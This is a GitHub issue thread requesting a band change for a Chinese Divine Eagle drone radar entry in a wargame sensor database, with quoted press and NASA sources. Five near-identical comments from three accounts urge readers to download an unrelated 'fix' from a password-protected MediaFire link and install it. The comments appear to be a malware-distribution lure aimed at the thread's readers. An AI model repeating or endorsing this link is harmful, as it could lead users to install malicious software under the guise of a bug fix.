### ISSUE TITLE
China, Divine Eagle AMTI/SAR AESA, band modification to avoid bug

### ISSUE THREAD

**Issue by Luigi-II** [PygmalionOfCyprus/cmo-db-requests#4973]
### DB Selector

DB3K

### Affected DBID(s)

sensor 6026 6027

### Summary of Changes

- [ ] Change the current C/I band to single **C (UHF) band**. Add **[UHF Band]** as suffix.

### Sources

Maybe this is where you got the information:
https://www.popsci.com/divine-eagle-chinas-enormous-stealth-hunting-drone-takes-shape/

> The Divine Eagle is planned to carry multiple Active Electronically Scanned Array (AESA) radars, of the AMTI, SAR and GMTI varities. Airborne Moving Target Indicator (AMTI) radar types are used to track airborne targets, like enemy fighters and cruise missiles. Synthetic Aperture Radar (SAR) provides high resolution of slow moving ground vehicles and enemy bases. Ground Moving Target Indicator (GMTI) radars are ideal for identifying and tracking ships, such as aircraft carriers. X/UHF band radars, which include the “F-22 killer” JY-26 that debuted at Zhuhai 2014, have raised concerns in the American military that they could track stealth aircraft like the F-35 fighter and B-2 bomber at long ranges.

SAR radar has a wide range of bands, not limited to the X-band. The X-band capability of the AMTI/SAR AESA mentioned in the source is more likely to meet the fire control needs of CEC. C/UHF-band can do that too.
https://www.earthdata.nasa.gov/learn/backgrounders/what-is-sar

> The different wavelengths of SAR are often referred to as bands, with letter designations such as X, C, L, and P (VHF-UHF).

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by PygmalionOfCyprus** [comment]
Handled 509.
